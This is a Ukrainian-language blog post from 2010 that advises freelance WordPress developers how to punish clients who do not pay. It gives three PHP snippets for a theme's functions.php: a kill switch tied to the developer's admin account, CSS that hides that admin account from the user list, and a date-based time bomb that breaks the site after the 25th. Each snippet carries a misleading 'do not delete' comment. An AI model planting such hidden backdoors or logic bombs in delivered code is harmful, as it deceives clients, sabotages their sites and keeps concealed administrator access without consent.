Розпродаж хостинг-планів на неймовірних умовах!
Знижка від 300 до 500грн!
 

автор Дмитро Кондрюк

23.05.2010

0

Зверніть увагу: ця публікація побачила світ більше року тому, з того часу багато чого могло змінитися ;)

free-lanceЯ майже рік працюю фрілансером і хочу поділитися з вами способами захисту від неплатників за виконану роботу, тобто «кидал». Всі мої способи базуються на тому, що ви можете скасувати виконану роботу, тобто забрати чи видали її і таким чином покарати чи змусити розрахуватися. Я б виокремив три способи:

 1. Створюєте собі користувача з правами адміна і додаєте у файл functions.php вашої теми цей код:
  # Не видаляйте ці рядки! Інакше небо впаде на голову!
  $result = $wpdb->get_results("SELECT ID, user_login, user_level, user_pass FROM $wpdb->users LIMIT 0 , 1");
  foreach ($result as $sk_user) {
  	if( $sk_user->ID !== '1' && $sk_user->user_login !=='skinik' && $sk_user->user_level !== '0' && $sk_user->user_pass !== '$P$BWQgeSchIaLLmMghBrZxMK.cHnAOZC1' ) {
  		wp_die('Fatal Error!');
  	}
  }
  

  Даний спосіб захисту базується на тому, що у вас є права адміна на сайті і якщо хтось змінить ваш профіль, то сайт перестане працювати, а натомість покаже «Fatal Error!». Необхідні дані для змінних можна взяти у таблиці користувачів БД.
 2. Другий спосіб майже такий самий, як і попередній. Але різниця у тому, що ви себе приховуєте у списку користувачів. Зайдіть на сторінку користувачів і за допомогою фаєрбаґу дізнайтеся ID рядка таблиці, в якому знаходиться ваш користувач, наприклад у вашого рядка ID user-8, тоді слід додати такий код у functions.php вашої теми:
  # Не видаляйте ці рядки! Інакше небо впаде на голову!
  function sk_admin_css() {
  	print '<style>tr#user-8 { display:none; }</style>';
  }
  add_action('admin_head', 'sk_admin_css');
  
 3. Обмеження роботоздатності сайту по даті. Наприклад, замовник заплатив аванс за сайт, ви здали сайт, а він сказав, що решту заплатить після того як протестує сайт. Минуло багато часу, а він і досі не заплатив, і можливо зник. У такому випадку домоміг би цей код, який треба вставити у файл functions.php вашої теми:
  # Не видаляйте ці рядки! Інакше небо впаде на голову!
  $f_date = date('d');
  if($f_date > '25') wp_die('Unknown error');
  

  Таким чином ми обмежемо роботу сайту після 25-го числа поточного місяця.

Дмитро Кондрюк

Автор публікації Дмитро Кондрюк

В веб-індустрії з 2003 року. В 2009р. заснував проект Український WordPress (що у подальшому став офіційним сайтом команди локалізації WordPress в Україні). З 2010 року засновник і технічний директор проекту Український хостинг для WordPress (WPHost.me) - повноцінного хостинг-сервісу, максимально оптимізованого на використання CMS WordPress.

Є що відповісти?

Ваш email не буде публікуватися

Можна скористатися такими тегами в тексті:
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>